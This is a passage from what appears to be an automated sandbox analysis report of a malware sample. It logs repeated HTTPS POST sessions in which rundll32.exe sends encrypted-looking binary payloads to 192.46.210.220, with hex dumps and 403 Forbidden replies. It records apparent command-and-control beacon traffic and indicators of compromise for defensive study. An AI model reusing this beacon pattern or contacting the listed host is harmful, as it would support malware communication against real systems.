                                                                                                        2021-10-28 02:58:59 UTC144OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:59 UTC149INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:59 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        3192.168.2.649763192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:07 UTC14OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:07 UTC15OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:08 UTC19INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:07 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        30192.168.2.649884192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:01 UTC149OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:01 UTC149OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:02 UTC154INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:02 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        31192.168.2.649886192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:02 UTC154OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:02 UTC154OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:03 UTC159INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:03 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        32192.168.2.649892192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:05 UTC159OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:05 UTC159OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:06 UTC164INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:06 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        33192.168.2.649894192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:06 UTC164OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:06 UTC164OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:07 UTC169INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:07 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        34192.168.2.649901192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:09 UTC169OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:09 UTC169OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:09 UTC174INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:09 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        35192.168.2.649903192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:10 UTC174OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:10 UTC174OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:11 UTC179INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:11 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        36192.168.2.649909192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:13 UTC179OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:13 UTC179OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:13 UTC184INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:13 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        37192.168.2.649911192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:14 UTC184OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:14 UTC184OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:15 UTC189INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:15 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        38192.168.2.649917192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:17 UTC189OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:17 UTC189OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:17 UTC194INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:17 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        39192.168.2.649919192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:18 UTC194OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:18 UTC194OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:18 UTC199INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:18 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        4192.168.2.649767192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:08 UTC19OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:08 UTC20OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:09 UTC24INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:09 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        40192.168.2.649925192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:21 UTC199OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
